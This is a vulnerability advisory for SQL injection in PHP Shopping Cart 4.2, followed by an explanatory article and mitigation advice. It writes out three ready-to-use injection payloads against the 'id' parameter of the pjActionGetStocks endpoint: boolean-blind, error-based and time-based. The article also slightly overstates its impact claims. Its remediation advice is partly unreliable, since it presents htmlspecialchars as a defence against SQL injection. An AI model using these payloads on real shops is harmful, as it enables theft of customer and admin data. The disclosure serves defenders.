PHP Shopping Cart 4.2 - Multiple-SQLi

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-01-29 
## Title: PHP Shopping Cart-4.2 Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `id` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the id parameter, and a database error
message was returned. Two single quotes were then submitted and the
error message disappeared. The attacker easily can steal all
information from the database of this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!

[+]Payload:
mysql

Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT
3795=3795-- sRcp&session_id=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (GTID_SUBSET)
    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT
(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2

## Proof and Exploit:
https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>


PHP Shopping Cart 4.2: A Critical SQL Injection Vulnerability Exposed

On September 13, 2023, cybersecurity researcher nu11secur1ty disclosed a severe vulnerability in PHP Shopping Cart 4.2, a widely used e-commerce script developed by PHP Jabbers. This flaw, identified as Multiple-SQLi, exposes the application to a range of SQL injection attacks, allowing attackers to extract sensitive data from the underlying database with minimal effort.

Understanding the Vulnerability

The core issue lies in the id parameter within the controller=pjFront&action=pjActionGetStocks endpoint. This parameter is used to retrieve product stock information, but it is not properly sanitized or parameterized. As demonstrated in the proof-of-concept, submitting a single quote (') in the id field triggers a database error, confirming that user input is directly injected into SQL queries.


controller=pjFront&action=pjActionGetStocks&id=1') OR NOT 3795=3795-- sRcp&session_id=

This payload exploits boolean-based blind SQL injection, where the attacker uses a condition that always evaluates to true (e.g., NOT 3795=3795) to manipulate the query logic. When the database returns a different response (e.g., a change in page content or behavior), the attacker can infer whether the injection was successful. This method is particularly effective when the application does not display error messages directly to the user.

Exploitation Techniques

nu11secur1ty demonstrated three distinct exploitation techniques, each leveraging different characteristics of MySQL databases:

  • Error-based SQL Injection: This technique uses MySQL-specific functions like GTID_SUBSET() to force the database to generate error messages containing sensitive data. The payload below triggers such an error: 
    
    controller=pjFront&action=pjActionGetStocks&id=1') AND GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=

    Here, CONCAT() is used to concatenate a hex-encoded string (e.g., qqzkq) with a conditional result, which is then passed to GTID_SUBSET(). The database error reveals the injected string, providing direct access to data.

  • Time-based Blind SQL Injection: This method relies on the SLEEP() function to delay query execution. If the database sleeps for 5 seconds, the attacker can infer that the injected condition is true: 
    
    controller=pjFront&action=pjActionGetStocks&id=1') AND (SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=

    By measuring the response time, attackers can deduce the truth of a condition, even when no direct output is available. This is particularly useful in environments where error messages are disabled.

Real-World Impact and Risk Assessment

Given that PHP Shopping Cart 4.2 is used by thousands of small to medium-sized businesses, the implications of this vulnerability are severe. An attacker can:

  • Extract customer data including names, email addresses, and payment details.
  • Access admin credentials stored in the database.
  • Modify or delete products, orders, or user records.
  • Perform privilege escalation by injecting commands to alter user roles.

As the vulnerability description warns: "Be careful what you buy! This will be your responsibility!" — a stark reminder that using unpatched software exposes organizations to significant data breaches.

Best Practices and Mitigation Strategies

For system administrators and penetration testers, this case highlights the importance of secure coding practices:

Recommended Action Implementation
Input Sanitization Use filter_var() or htmlspecialchars() to validate and sanitize user inputs before processing.
Parameterized Queries Replace direct SQL concatenation with prepared statements using PDO or mysqli_stmt_prepare().
Input Validation Ensure id parameters are numeric and validated against a whitelist of known product IDs.
Security Headers Disable error reporting in production environments using display_errors = Off in php.ini.

For developers, the following corrected code snippet demonstrates proper implementation:


// Corrected PHP code using PDO
try {
    $pdo = new PDO("mysql:host=localhost;dbname=shop_db", "user", "pass");
    $stmt = $pdo->prepare("SELECT * FROM products WHERE id = ?");
    $stmt->execute([$_GET['id']]);
    $result = $stmt->fetchAll();
} catch (PDOException $e) {
    error_log("Database error: " . $e->getMessage());
    // Do not expose details to user
}

This approach eliminates the risk of SQL injection by separating the query logic from user input, ensuring that only valid data is processed.

Conclusion

The PHP Shopping Cart 4.2 vulnerability serves as a cautionary tale for developers and organizations relying on third-party scripts. Even seemingly minor flaws in input handling can lead to catastrophic data exposure. As cybersecurity threats evolve, it is imperative to:

  • Regularly audit and update software.
  • Implement secure coding standards.
  • Conduct penetration testing with tools like Burp Suite or sqlmap.

By adopting proactive security measures, businesses can protect their customers, maintain trust, and avoid costly breaches.